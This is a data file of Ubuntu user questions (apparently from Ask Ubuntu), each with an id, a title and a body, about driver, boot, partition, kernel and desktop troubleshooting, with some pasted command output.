251300	opposite command for `` ulimit -c unlimited ''	i encountered a bug in eclipse with this error log reported as bug # 1097078 . according to the error log , there was a line as failed to write core dump . core dumps have been disabled . to enable core dumping , try `` ulimit -c unlimited '' before starting java again then , i executed ulimit -c unlimited . now i think ( not sure ) it is causing some problem as my eclipse is closing automatically which showed some error message like ( not accurate ) memory full , you do n't have enough memory to collect data the first time . my question is , what is the command opposite to ulimit -c unlimited ?
251303	how to automatically install updates before shutdown ?	windows 7 automatically installs updates before shutdown . can i get the same effect on xubuntu ? i want to install xubuntu on a friend 's machine and make sure that security updates are installed , but he is computer illiterate , and i do n't want him to be constantly bothered with update notifications .
251305	xfce panel overlaying windows	i have set up a panel ( panel no.2 , from 0,1,2 ) in xfce ubuntu , and i want it to be at desktop level - covered by windows . i found something about it on the archlinux wiki . https : //wiki.archlinux.org/index.php/xfce ( ctrl+f `` panel at desktop level '' ) so i did that , i created the script and run it on startup . it took me a bit of playing until it started to work - when i set 2 as the parameter for the script . i was happy for a while , but after a restart the panel was showing over my windows again . so i played with it again , and it started to work when i set `` 5 '' as the parameter . restart again , and same as before , panel2 is misbehaving again . now , i tried to just guess-set the parameter to 8 ( 2+3=5 , 5+3=8 ) , it did not work . i would really appreciate , if i could just set it and enjoy it until i decide to change it . what is the reason the `` right '' parameters change ? what did i mis-understand ? is there a better way to do it ? thanks very much in advance .
251306	how to determine status of upstart job in bash script ?	how do you determine if an upstart job is running inside of a bash script ? that is i need a `` boolean '' value to do something like : # ! /bin/bash if [ determine_if_job_x_is_running ] ; then echo `` i see upstart job x is running , please stop it before ... '' fi
251307	performance tuning/diagnotics help needed ... ( 12.04lts 64bit , lvm , & luks )	i just performed a fresh install of 12.04lts 64-bit , using the alternate cd , with lvm and luks . install went fine but i 've noticed a few quirks and was hoping for some pointers/suggestions from the community . issues : on boot , before entering encryption pass phrase , i get a message `` error : no video mode activated '' ( everything seems to work fine though ) i 've got a noticeable but inconsistent `` lag/delay '' in the launcher/nautilus with the new load . the delay can sometimes be as much as 5+ seconds . things like the compiz cube/rotator work very fast so i do n't think it 's a graphics issue . note : neither of these issues were present in my original 32bit std install ( using the disc from the `` ubuntu unleashed 2012 edition '' book . ) question : how do i get rid of the boot error ( i 'm guessing it 's a config issue with grub ) ? what would be the best way to further diagnose the `` lag '' that i 'm experiencing ? i 'm not sure if it 's an issue with 64-bit precise ( though i seen several posts reporting the issue with no solutions ) or full disk encryption . i know my cpu supports aes-ni , how do i determine if it 's enabled/configured properly ? my system : hp z210 sff workstation intel xeon e3-1245 quad-core , hyperthreaded integrated intel hd 3000 graphics ( registering as `` intel sandybridge server '' after installing mesa-utils ) 8gb ram 500gb hdd ( lvm & luks configured using the wizard on the entire drive ) top : top - 13:37:05 up 2:12 , 2 users , load average : 0.06 , 0.21 , 0.21 tasks : 210 total , 1 running , 209 sleeping , 0 stopped , 0 zombie cpu ( s ) : 0.1 % us , 0.0 % sy , 0.0 % ni , 99.9 % id , 0.0 % wa , 0.0 % hi , 0.0 % si , 0.0 % st mem : 8063752k total , 4227732k used , 3836020k free , 34392k buffers swap : 8269820k total , 53548k used , 8216272k free , 3418876k cached
251316	unable to install / open ubuntu	i just installed ubuntu using the along side windows installer . i rebooted and when opening says ( please insert your windows disc to repair ) but this is on the ubuntu side , has done every time i have tried to use it but my windows is fine . need help !
251319	ca n't update or remove postgresql 9.1	the last update of postgresql 9.1.7 seems to break my apt . when i try to update , i get the following error : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : postgresql : depends : postgresql-9.1 but it is not going to be installed postgresql-contrib-9.1 : depends : postgresql-9.1 ( = 9.1.7-0ubuntu12.04 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . i tried to run apt-get -f install , same error . finally , i tried to remove everything using apt-get -- purge remove postgresql , same error again . note : i installed postgresql using the following ppa : https : //launchpad.net/~pitti/+archive/postgresql thanks .
251320	unity freezes after installing recommended nvidia drivers	i got ubuntu 12.04 up and running with all the latest updates and everything was fine until i decided to install the recommended nvidia drivers from the addtional drivers application . after rebooting and logging in unity wo n't load properly . the desktop loads really slow and simple things like clicking on the unity menu in the top left corner now take ages to register . at first i thought something went wrong during the installation , so i popped in my usb flash drive , formatted the ubuntu partition and reinstalled it . once it was done i tried installing the recommended nvidia drivers again and the same issue appeared . my system specs are an intel core 2 duo e6750 cpu with 2gb of ram and a geforce 8800gts graphics card .
251331	centrino n-6205 frequent disconnection	i have frequent disconnections from internet using wifi . it happens only when i 'm on my home network and it does n't happens on other devices that are connected to my router . so it seems specific to this computer with this network . here some info about my setup . laptop : lenovo x230 wireless card : centrino advance n-6205 ubuntu 12.04 64bits kernel : 3.5.0-23-generic network encryption : wpa when it happens , the network manager applet shows that i 'm connected but it 's impossible to open an internet page . i have to reconnect to the network to have internet back . thanks for helping , much appreciate .
251332	how do i get my network drivers working ?	i have ubuntu 12.04 on a lenovo g580 with atheros ar8162 ethernet and broadcom bcm4313 wireless driver . i try the this : how do i get an atheros ar8162 working ? but it does n't work . when i type make install it comes : fatal : could not open /lib/modules/3.2.0-29.generic-pae/modules.dep.temp for wirting : permission denied make *** [ unistall ] error 1 edit : 05.02.2012 after i try it with sudo ( thx to maggotbrain ) cablebased network works . i update my system and install the broadcom-sta-wlan-driver . restart and after my reboot cablebased network does n't work anymore and i can see wlan 's but i ca n't connect .
251333	step by step guide to connect to blogger using drivel	i use ubuntu 12.04 . does any body know a step-by-step guide to connect drivel to blogger ? i have tried several times to log in using my google account , but it always returns an error . < span weight= '' bold '' size= '' larger '' > server error < /span > network connection failed
251334	lubuntu 12.10 on dell d830 with nvidia quadro nvs 140m	i am trying to use the nvidia accelerated proprietary driver . i am currently trying to use the one from the https : //launchpad.net/~ubuntu-x-swat/+archive/x-updates as none of the others including the one i downloaded from the nvidia website worked . i have tried tips from various websites . my lubuntu boots to a blue screen then goes black . the open source driver works , but is not very quick . this is lubuntu which runs lxde instead of unity
251336	did i lose all my windows files ?	i decided to switch from windows 7 to ubuntu 12.10 . i had windows 7 on partition c : and other files ( photos , music etc . ) on partition d : . during installation i chose c : partition for linux and checked box to encrypt drive . now on ubuntu i ca n't mount d : partition . it seems that partition does n't exist . what to do ? did i lose all my windows files ? fdisk -l disk /dev/sda : 120.0 gb , 120034123776 bytes 255 heads , 63 sectors/track , 14593 cylinders , total 234441648 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000a2484 device boot start end blocks id system /dev/sda1 * 2048 499711 248832 83 linux /dev/sda2 501758 234440703 116969473 5 extended /dev/sda5 501760 234440703 116969472 83 linux disk /dev/mapper/sda5_crypt : 119.8 gb , 119774642176 bytes 255 heads , 63 sectors/track , 14561 cylinders , total 233934848 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/sda5_crypt does n't contain a valid partition table disk /dev/mapper/ubuntu-root : 116.6 gb , 116551319552 bytes 255 heads , 63 sectors/track , 14169 cylinders , total 227639296 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/ubuntu-root does n't contain a valid partition table disk /dev/mapper/ubuntu-swap_1 : 3221 mb , 3221225472 bytes 255 heads , 63 sectors/track , 391 cylinders , total 6291456 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/ubuntu-swap_1 does n't contain a valid partition table disk /dev/mapper/cryptswap1 : 3221 mb , 3221225472 bytes 255 heads , 63 sectors/track , 391 cylinders , total 6291456 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0593f7a2 disk /dev/mapper/cryptswap1 does n't contain a valid partition table user @ user-n-a : ~ $ ^c user @ user-n-a : ~ $ sudo fdisk -l disk /dev/sda : 120.0 gb , 120034123776 bytes 255 heads , 63 sectors/track , 14593 cylinders , total 234441648 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000a2484 device boot start end blocks id system /dev/sda1 * 2048 499711 248832 83 linux /dev/sda2 501758 234440703 116969473 5 extended /dev/sda5 501760 234440703 116969472 83 linux disk /dev/mapper/sda5_crypt : 119.8 gb , 119774642176 bytes 255 heads , 63 sectors/track , 14561 cylinders , total 233934848 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/sda5_crypt does n't contain a valid partition table disk /dev/mapper/ubuntu-root : 116.6 gb , 116551319552 bytes 255 heads , 63 sectors/track , 14169 cylinders , total 227639296 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/ubuntu-root does n't contain a valid partition table disk /dev/mapper/ubuntu-swap_1 : 3221 mb , 3221225472 bytes 255 heads , 63 sectors/track , 391 cylinders , total 6291456 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/ubuntu-swap_1 does n't contain a valid partition table disk /dev/mapper/cryptswap1 : 3221 mb , 3221225472 bytes 255 heads , 63 sectors/track , 391 cylinders , total 6291456 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0593f7a2 disk /dev/mapper/cryptswap1 does n't contain a valid partition tabl
251337	kubuntu 12.10 amd 64bit and lubuntu 12.10 amd 64 bit not booting through live usb on dell inspiron n5050 laptop	wen i tried to make live usb of lubuntu 12.10 and also of kubuntu 12.10 i come up with same stuff only boot scrren appears and wen selected in live mode kubuntu/lubuntu start screen appears and suddenly stops booting dont understand wat the issue is i tried different lash drive using fedora live usb creator n unetbootin also downloaded another iso but same issue hardware overview this system was tested with these key components : processor intel ( r ) pentium ( r ) cpu b940 @ 2.00ghz video intel corporation 2nd generation core processor family integrated graphics controller network atheros communications , inc. ar3011 bluetooth network realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller the following components are contained in the dell inspiron 15 n5050 laptop , which has been awarded the status of certified for ubuntu . audio intel corporation 6 series/c200 series chipset family high definition audio controller bluetooth atheros communications , inc. ar3011 bluetooth atheros communications , inc. ar3011 bluetooth cdrom tsstcorp dvd+-rw ts-l633j optiarc dvd+-rw ad-7717h unknown optiarc dvd+/-rw ad-7717h capture suyin corp. 064e:8123 ( usb ) unknown intergrated webcam disk unknown wdc wd5000bpvt-75hxzt1 pqi pqi usb flash drive adata adata usb flash drive mushkin mknufdpr2gb generic- multi-card keyboard unknown at translated set 2 keyboard mouse unknown dualpoint stick unknown pixart usb optical mouse unknown imps/2 alps glidepoint network atheros communications , inc. ar3011 bluetooth realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller other unknown i8042 kbd port unknown i8042 aux port unknown hda intel pch unknown power button unknown video bus unknown hda intel pch hdmi/dp , pcm=3 unknown hda intel pch mic at ext left jack unknown hda intel pch hp out at ext left jack sanyo dell 4yrjh15 unknown hci0 unknown dell-wifi scsi realtek semiconductor corp. rts5138 card reader controller power quotient international co. , ltd 3538:0901 ( usb ) kingston technology company inc. 13fe:3600 ( usb ) a-data technology co. , ltd. c906 flash drive touch unknown alpsps/2 alps dualpoint touchpad usb intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 unknown linux foundation 2.0 root hub pixart imaging , inc. optical mouse unknown 118c:0504 ( pnp ) unknown 0000 ( ata_device ) intel corporation 2nd generation core processor family dram controller intel corporation 6 series/c200 series chipset family 6 port sata ahci controller intel corporation 6 series/c200 series chipset family pci express root port 1 intel corporation 6 series/c200 series chipset family mei controller # 1 intel corporation hm67 express chipset family lpc controller pnp ibm enhanced keyboard controller ( 101/2-key ) pnp 41d0:0a08 ( pnp ) pnp at real-time clock pnp motherboard registers pnp acpi control method battery pnp acpi power button device pnp pci interrupt link device pnp 41d0:0c14 ( pnp ) int 25d4:340e ( pnp ) video intel corporation 2nd generation core processor family integrated graphics controller wireless atheros communications inc. ar9285 wireless network adapter ( pci-express
251338	hide files in ubuntu 12.04	i would like to ask , if it 's possible to hide files from nautilus without adding a dot at the beginning of the file/folder .
251342	gtk version problem while installing themes to ubuntu 12.10	i am a little confused with the gtk stuff . i heard ubuntu 12.10 already has gtk3.6.0 . i am trying to install a theme that says it requires gtk 3.6.0 . so when i click download , it does n't download , nothing happens . themes in gtk2 download just fine though , and when using the terminal to check what version of gtk3 i have , it says i have none . what do i need to do to either install gtk3 , or enable it so i can run any themes from gnome-look ?
251343	bootable version of ubuntu to burn onto a cd ( not dvd )	is there a *.iso copy ( old one even ) of ubuntu that i can burn onto a cd so i can install it and then upgrade to the latest version . thanks in advance
251344	how to prevent applications from separate workspaces all landing on a single workspace when docking back into docking-station ?	now that finally docking seems to be fully supported on my system , hurray ! , i can address a relatively minor issue ( or even a bug ? ) : normally , i have ( all ) four workspaces populated with my standard applications . whenever i dock back into my docking-station ( e.g . from standby-mode ) , all the open applications from separate workspaces land on a single -- the one `` active '' whilst re-docking -- workspace . `` fixing '' that , i.e. , getting my stuff back in the correct order and every application back into its respective and pre-ordained workspace , takes me about 5 - 10 seconds , so i can live with that ... but clearly it 's sub-ideal . any comments & help much appreciated .
251345	xubuntu 12.10 : possible to use animated gifs as a background ?	i really , really want to use http : //www.reddit.com/r/cinemagraphs i 've done a lot of research on this , but the answers seem to vary greatly and i have n't had much success with any of the other suggestions , and i ca n't find any answers on xubuntu 12.10 , only earlier versions of xubuntu ( not many ) , but mostly just ubuntu . i feel these gifs would be perfect for a background ( though they are a bit low-res , good enough for now ) also , i do run dual monitors , so if something can be tailored to that fact ( but def not required , any info will do ) , i 'd be most appreciative .
251348	why does unity launcher start the wrong program ?	when i left click the libreoffice icon firefox launches instead . a right click gives me a choice of new document firefox lock to launcher . until some recent updates this never happened before . other programs do n't exhibit this behaviour . why ?
251355	need help post installation of amd radeon 7600m graphics driver	i downloaded the latest graphics driver from amd website and installed it . after a reboot i am getting these screens and am unable to proceed . though i am able to login through command line mode . startx command gives an error . when the image in the screen shot appears i am unable to press any of the buttons on it ... i am at a loss on how to continue . i am running ubuntu 12.10 64 bit on wibi .
251356	photoshop path not working properly under wine	great community . i have a big question . i 've installed adobe photoshop cs . i know that this version is old : ( . well my problem is when i 'm trying to use the path tool . i can make a new anchor point , but when i like to cut the point to make another ( alt + click ) . it does n't works . when i press the alt button the window moves and i ca n't solve this problem by myself . please help me ! p.d : i tried using gimp . it 's great : ) but does n't support cmyk color profile . that 's the reason i used photoshop under wine .
251358	how to fix `ubi-timezone failed with exit code 1` error ?	i 'm trying to install lubuntu 12.10 on a fujitsu lifebook c-2220 ( pentium 4 - 2.40ghz , 215mb ram ) . i 'm installing from a usb drive . i reach the `` where are you ? '' page , click continue , and get the error ubi-timezone failed with exit code 1 . any suggestions ?
251362	is it possible to sign the ubuntu code of conduct , 2.0 in i already signed 1.1 ?	i am currently trying to sign the ubuntu coc , version 2.0 , and i have already signed 1.1 . when i visit http : //launchpad.net/codeofconduct , i am told : the current version is 2.0 , released 2005-04-12 congratulations , you have already signed the ubuntu code of conduct . following the link shows a signature for 1.1 , using my pgp keys . in addition , i signed 1.1 long after 2005 , and 1.1 was reported as the current version . did i accidentally sign the wrong version , causing me to lock out of the signing system ? i do n't want to invalidate my current signature , if at all possible .
251363	disabling all keyboard shortcuts ubuntu 12.04 lts	hey i want to lock down ubuntu so that it only has access to chrome and the ability to logout . is there a way to get rid of all keyboard shortcuts ? thanks for your help !
251369	can i have a ntfs data partition both accessible ( r/w ) by separate windows and ubuntu partitions ?	the following image illustrates the partition setup i have in my head , but what i 'm unsure about is the data partition . i 've heard linux support for ntfs is fairly good nowadays , but since it is ultimately reverse engineered it is still not perfect . is there a possibility i could lose data when ubuntu is accessing it ? and should i follow a different method to share files ? thanks : )
251370	installation in mac from bootable usb stick	i have two installation issues . 1 ) trying to install ubuntu in a macbook air mac osx , i ca n't seem to get past step 7 : run diskutil unmountdisk /dev/diskn ( replace n with the disk number from the last command ; in the previous example , n would be 2 ) . any suggestions ? 2 ) i 'm trying to install openfoam in a pc but ca n't seem to get it done either . in the pc it gives me an error of unable to find the file : vers= $ ( lsb_release -cs ) sudo sh -c `` echo deb http : //www.openfoam.org/download/ubuntu $ vers main > /etc/apt/sources.list.d/openfoam.list '' sudo apt-get install openfoam211 anybody know how to work around this issue ? thanks for any help on this matter . gerson
251373	how to fix eclipse ( jee juno sr1 ) black background tool-tips in ubuntu 12.10 ?	this seems to be a fairly common issue but i could not find any help regarding ubuntu 12.10 version . i 'm a rookie at ubuntu but i think that the solutions for the older versions could not be used at quantal quetzal . am i missing something ?
251374	which version to install : desktop or server ?	i have a redhat linux machine that i use to host subversion and run a number of cad tools on . redhat is now so out-of-date that it refuses to update firefox . so i 'd like to upgrade to ubuntu . i run ubuntu on my laptop and remote access into the redhat machine when out-of-towm . i run the redhat machine headless and always remote access it from a windows machine ( ugh ) in my office . which is the correct version of ubuntu to load to replace redhat for my application . i 'm by no way a linux expert but can usually find my way around with a few hints ! thanks
251375	ca n't get 1920 x 1080 in ubuntu via vmware	i just installed ubuntu and typed in sudo apt-get install open-vm-tools i can change my resolution to 1920 x 1200 , but not 1920 x 1080 . any ideas ? i 've tried this , and this but no luck . the second link is for virtualbox i 've tried changing the vmware settings on my host computer ( windows 8 ) and on my guest os ( ubuntu ) with no luck . really need this to work . i do n't think i 'm running the vm tools correctly . apparently i 'm supposed to run the .pl file , but when i double click it , a text file just opens up . xrandr : xrandr screen 0 : minimum 1 x 1 , current 1360 x 768 , maximum 8192 x 8192 virtual1 connected 1360x768+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 800x600 60.0 + 60.3 2560x1600 60.0 1920x1440 60.0 1856x1392 60.0 1792x1344 60.0 1920x1200 59.9 1600x1200 60.0 1680x1050 60.0 1400x1050 60.0 1280x1024 60.0 1440x900 59.9 1280x960 60.0 1360x768 60.0* 1280x800 59.8 1152x864 75.0 1280x768 59.9 1024x768 60.0 640x480 59.9 virtual2 disconnected ( normal left inverted right x axis y axis ) virtual3 disconnected ( normal left inverted right x axis y axis ) virtual4 disconnected ( normal left inverted right x axis y axis ) virtual5 disconnected ( normal left inverted right x axis y axis ) virtual6 disconnected ( normal left inverted right x axis y axis ) virtual7 disconnected ( normal left inverted right x axis y axis ) virtual8 disconnected ( normal left inverted right x axis y axis )
251376	how to debug when upstart hangs ?	i have recently much trouble with services started by upstart . currently i have problems with avahi-daemon and rsyslogd . most of the time i had that problem on ubuntu > = 12.04 . what 's the problem ? if i stop such a service , the stop-script hangs ( waited 2 day on one server ) . when i kill it the service remains in the following state stop/killed , process < pid > which is undocumented ( just stop/killed is documented ! ) . the service really is down . now when i try to start the service with service < service > start again the start script hangs , too . my question to that is : how shall i debug such problems ? the start/stop scripts just do nothing at a point and it is intranparent to me what causes this . i even had that problem with the unattended-upgrades
251378	where is virtualenvwrapper.sh ?	i do n't know what 's more embarrassing : that i do n't know how to go about finding the answer to this question myself , or that it has to be asked at all in the first place , but ... where does apt-get put the virtualenvwrapper.sh script after it installs virtualenvwrapper ? i 'm at wits ' end ... % sudo apt-get install virtualenvwrapper ... % rehash % which virtualenvwrapper.sh virtualenvwrapper.sh not found % which virtualenvwrapper virtualenvwrapper not found % find / -path /media -prune -o -name virtualenvwrapper.sh /media % dpkg-query -l virtualenvwrapper | grep 'virtualenvwrapper\.sh' % sudo apt-get install virtualenvwrapper reading package lists ... building dependency tree ... reading state information ... virtualenvwrapper is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . i 've run out of things to try : apt-get says virtualenvwrapper is already installed , but i ca n't find any sign of virtualenvwrapper.sh anywhere . update : well , i just discovered that the file /etc/bash_completion.d/virtualenvwrapper ... looks very much like virtualenvwrapper.sh . i ca n't tell whether this file was put there by apt-get when i ran apt-get install virtualenvwrapper ( the file 's mdate is several months ago ) , but if it was , then i 'm mystified by the apparent stupidity of the arrangement ... for one thing , not everyone uses bash ( i happen to use zsh ) . for another , one may want to run virtualenvwrapper.sh at times other than startup ... i 'm sure i 'm missing something major here , but on the surface , it sure looks like the apt-get installation of virtualenvwrapper is plain retarded ... at any rate , it wasted about three hours of my time ...
251381	why is xorg-edgers ppa not updated with nvidia-current ?	nvidia 313.18 was released a couple of weeks ago and i was not notified of a possible upgrade . i have the xorg-edgers ppa installed but when i tried installing nvidia-current it said i was up to date with 313.09 even thought build 313.18 was in the repository . i was finally able to install 313.18 by installin nvidia-313 . i just wanted to know why this happened and if i need to this in the future to receive updates .
251385	trouble upgrading to kernel 3.7.6 from 3.7.5	is kernel 3.7.6 compatible with nvidia driver 313.18 . i tried installing it through the upubuntu guide but i was getting an error . i tried using their fix but it said the directories were not found . any suggestions this is what i get unpacking replacement linux-headers-3.7.6-030706-generic ... preparing to replace linux-headers-3.7.6-030706 3.7.6-030706.201302040006 ( using linux-headers-3.7.6-030706_3.7.6-030706.201302040006_all.deb ) ... unpacking replacement linux-headers-3.7.6-030706 ... selecting previously unselected package linux-image-3.7.6-030706-generic . unpacking linux-image-3.7.6-030706-generic ( from linux-image-3.7.6-030706-generic_3.7.6-030706.201302040006_amd64.deb ) ... done . selecting previously unselected package linux-image-extra-3.7.6-030706-generic . unpacking linux-image-extra-3.7.6-030706-generic ( from linux-image-extra-3.7.6-030706-generic_3.7.6-030706.201302040006_amd64.deb ) ... setting up linux-headers-3.7.6-030706 ( 3.7.6-030706.201302040006 ) ... setting up linux-image-3.7.6-030706-generic ( 3.7.6-030706.201302040006 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/dkms 3.7.6-030706-generic /boot/vmlinuz-3.7.6-030706-generic error ( dkms apport ) : kernel package linux-headers-3.7.6-030706-generic is not supported error ! bad return status for module build on kernel : 3.7.6-030706-generic ( x86_64 ) consult /var/lib/dkms/nvidia-313/313.18/build/make.log for more information . run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.7.6-030706-generic /boot/vmlinuz-3.7.6-030706-generic update-initramfs : generating /boot/initrd.img-3.7.6-030706-generic run-parts : executing /etc/kernel/postinst.d/pm-utils 3.7.6-030706-generic /boot/vmlinuz-3.7.6-030706-generic run-parts : executing /etc/kernel/postinst.d/update-notifier 3.7.6-030706-generic /boot/vmlinuz-3.7.6-030706-generic run-parts : executing /etc/kernel/postinst.d/zz-update-grub 3.7.6-030706-generic /boot/vmlinuz-3.7.6-030706-generic generating grub.cfg ... found linux image : /boot/vmlinuz-3.7.6-030706-generic found initrd image : /boot/initrd.img-3.7.6-030706-generic found linux image : /boot/vmlinuz-3.7.5-030705-generic found initrd image : /boot/initrd.img-3.7.5-030705-generic found linux image : /boot/vmlinuz-3.7.4-030704-generic found initrd image : /boot/initrd.img-3.7.4-030704-generic found linux image : /boot/vmlinuz-3.7.3-030703-generic found initrd image : /boot/initrd.img-3.7.3-030703-generic found linux image : /boot/vmlinuz-3.7.2-030702-generic found initrd image : /boot/initrd.img-3.7.2-030702-generic found linux image : /boot/vmlinuz-3.7.1-030701-generic found initrd image : /boot/initrd.img-3.7.1-030701-generic found linux image : /boot/vmlinuz-3.7.0-030700-generic found initrd image : /boot/initrd.img-3.7.0-030700-generic found linux image : /boot/vmlinuz-3.7.0-7-generic found initrd image : /boot/initrd.img-3.7.0-7-generic found linux image : /boot/vmlinuz-3.7.0-4-generic found initrd image : /boot/initrd.img-3.7.0-4-generic found linux image : /boot/vmlinuz-3.6.10-030610-generic found initrd image : /boot/initrd.img-3.6.10-030610-generic found linux image : /boot/vmlinuz-3.6.9-030609-generic found initrd image : /boot/initrd.img-3.6.9-030609-generic found linux image : /boot/vmlinuz-3.5.0-19-generic found initrd image : /boot/initrd.img-3.5.0-19-generic found linux image : /boot/vmlinuz-3.5.0-17-generic found initrd image : /boot/initrd.img-3.5.0-17-generic found memtest86+ image : /boot/memtest86+.bin done setting up linux-image-extra-3.7.6-030706-generic ( 3.7.6-030706.201302040006 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/dkms 3.7.6-030706-generic /boot/vmlinuz-3.7.6-030706-generic error ( dkms apport ) : kernel package linux-headers-3.7.6-030706-generic is not supported error ! bad return status for module build on kernel : 3.7.6-030706-generic ( x86_64 ) consult /var/lib/dkms/nvidia-313/313.18/build/make.log for more information . run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.7.6-030706-generic /boot/vmlinuz-3.7.6-030706-generic update-initramfs : generating /boot/initrd.img-3.7.6-030706-generic run-parts : executing /etc/kernel/postinst.d/pm-utils 3.7.6-030706-generic /boot/vmlinuz-3.7.6-030706-generic run-parts : executing /etc/kernel/postinst.d/update-notifier 3.7.6-030706-generic /boot/vmlinuz-3.7.6-030706-generic run-parts : executing /etc/kernel/postinst.d/zz-update-grub 3.7.6-030706-generic /boot/vmlinuz-3.7.6-030706-generic generating grub.cfg ... found linux image : /boot/vmlinuz-3.7.6-030706-generic found initrd image : /boot/initrd.img-3.7.6-030706-generic found linux image : /boot/vmlinuz-3.7.5-030705-generic found initrd image : /boot/initrd.img-3.7.5-030705-generic found linux image : /boot/vmlinuz-3.7.4-030704-generic found initrd image : /boot/initrd.img-3.7.4-030704-generic found linux image : /boot/vmlinuz-3.7.3-030703-generic found initrd image : /boot/initrd.img-3.7.3-030703-generic found linux image : /boot/vmlinuz-3.7.2-030702-generic found initrd image : /boot/initrd.img-3.7.2-030702-generic found linux image : /boot/vmlinuz-3.7.1-030701-generic found initrd image : /boot/initrd.img-3.7.1-030701-generic found linux image : /boot/vmlinuz-3.7.0-030700-generic found initrd image : /boot/initrd.img-3.7.0-030700-generic found linux image : /boot/vmlinuz-3.7.0-7-generic found initrd image : /boot/initrd.img-3.7.0-7-generic found linux image : /boot/vmlinuz-3.7.0-4-generic found initrd image : /boot/initrd.img-3.7.0-4-generic found linux image : /boot/vmlinuz-3.6.10-030610-generic found initrd image : /boot/initrd.img-3.6.10-030610-generic found linux image : /boot/vmlinuz-3.6.9-030609-generic found initrd image : /boot/initrd.img-3.6.9-030609-generic found linux image : /boot/vmlinuz-3.5.0-19-generic found initrd image : /boot/initrd.img-3.5.0-19-generic found linux image : /boot/vmlinuz-3.5.0-17-generic found initrd image : /boot/initrd.img-3.5.0-17-generic found memtest86+ image : /boot/memtest86+.bin done setting up linux-headers-3.7.6-030706-generic ( 3.7.6-030706.201302040006 ) ... examining /etc/kernel/header_postinst.d . run-parts : executing /etc/kernel/header_postinst.d/dkms 3.7.6-030706-generic /boot/vmlinuz-3.7.6-030706-generic error ( dkms apport ) : kernel package linux-headers-3.7.6-030706-generic is not supported error ! bad return status for module build on kernel : 3.7.6-030706-generic ( x86_64 ) consult /var/lib/dkms/nvidia-313/313.18/build/make.log for more information .
251386	why does n't ubuntu load ?	i downloaded the ubuntu-12.10-desktop-amd64.iso . then i created a bootable usb stick using the guide from [ here ] [ 1 ] . i booted the usb stick and after the ubuntu logo and some circles loaded beneath it , nothing happened ; my laptop started making some weird noise . so i booted the usb again , but this time with `` acpi=off , noapic and nolapic '' enabled . this time the booting process went past the circle loading thingy , but halted again and the weird noise started . check the screenshot to see the lines of code rendered . why is n't the os booting properly ?
251389	grub error 15 . ca n't boot	i made a partition with windows disk management ( 40gb ) for the purpose of installing ubuntu . it worked fine and i saw it next to the c drive so i turned of the computer and grabbed my usb with ubuntu on ( ubuntu-12.10-desktop-i386 ) and i used linuxlive to make the usb ubuntu `` ready '' ( linuxlive usb creator 2.8.19 ) i got everything working and all but then i was going to start my laptop again ( the same one that i made a partition on ) but after the dell logo i got this message : '' grub loading stage1.5 . grub loading , please wait ... error 15 '' i thought that it was strange that i could n't boot my windows so i look in the boot options ( f12 on my dell ) but i could only find a legacy boot list and other options , i could n't choose which partition i wanted to boot so i tried to reboot the computer with my ubuntu usb . fyi i did n't put anything on the new made partition , i 've only tried ubuntu in vmware player . i got thru the setup and i choose to delete the 40gig partition i made and created a new one with ubuntu . i thought everything was fine so i restarted the computer ( when the setup told me to ) and removed the usb . but then i booted my computer i still hade the same error : /
